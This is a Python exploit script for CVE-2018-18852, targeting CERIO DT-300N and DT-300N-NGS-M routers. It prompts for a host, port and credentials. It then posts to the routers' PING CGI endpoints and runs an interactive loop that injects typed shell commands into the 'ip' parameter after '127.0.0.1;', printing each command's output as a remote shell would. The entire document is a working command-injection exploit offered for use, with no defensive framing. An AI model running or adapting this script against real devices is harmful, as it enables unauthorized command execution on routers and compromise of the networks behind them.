CVE-2018-18852/exp.py

#author:九世
#time:2019/1/30

import requests
import json
import base64

class Demo:
    def __init__(self,headers,url,payload,url2):
        self.headers=headers
        self.url=url
        self.payload=payload
        self.url2=url2

    def requet(self):
        ver = 'DT-300N-NGS-M'
        ver2='DT-300N'
        version=''
        vurl=''
        rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)
        nurl=''
        nersion=''
        if rqt.status_code==requests.codes.ok:
            print('[+] Router version number is {}'.format(ver))
            while True:
                rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
                nurl+=rqt.url
                nersion+=ver
                nary=json.loads(rqt.content)
                cmd = input('command：')
                payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': nary['pid'], 'Times': 1}
                self.command(self.url, headers, payload,nersion)

        elif rqt.status_code==requests.codes.not_found: #判断状态码是否为404
            print('[-] Router version number is not {}'.format(ver))
            rqts=requests.post(url=self.url2,headers=headers,data=self.payload)
            if rqts.status_code==requests.codes.ok:
                print('[+] Router version number is {}'.format(ver2))
                while True:
                    rqts = requests.post(url=self.url2, headers=headers, data=self.payload)
                    version+=ver2
                    vurl+=rqts.url
                    vary=json.loads(rqts.content)
                    cmd=input('command：')
                    payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': vary, 'Times': 1}
                    self.command(self.url2,headers,payload,version)
            elif rqts.status_code==requests.codes.not_found:
                print('[-] Router version number is not {}'.format(ver2))
                exit()
            elif rqts.status_code==requests.codes.unauthorized:
                print('[-] Auth is invalid, try other creds')
                exit()

    def command(self,url,header,data,ver):
        rsv=requests.post(url=url,headers=header,data=data)
        if ver=='DT-300N':
            print(rsv.text.split('/html')[1])
        else:
            print(rsv.text.split('[[[')[1])
if __name__ == '__main__':
    print('[&] The version of CERIO that is vulnerable is as follows')
    print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
    print('')
    t=''
    path='/cgi-bin/main.cgi?cgi=PING&mode=9'
    path2='/cgi-bin/Save.cgi?cgi=PING'
    user=input('host:').strip()
    ports=input('port:').strip()
    username=input('creds:').strip()
    creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')
    if ports in '443':
        t+='https://'
    else:
        t+='http://'


    urls=t+user+':'+ports+path
    urls2=t+user+':'+ports+path2
    payload={'cgi':'PING','mode':9}
    headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}
    obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)
    obj.requet()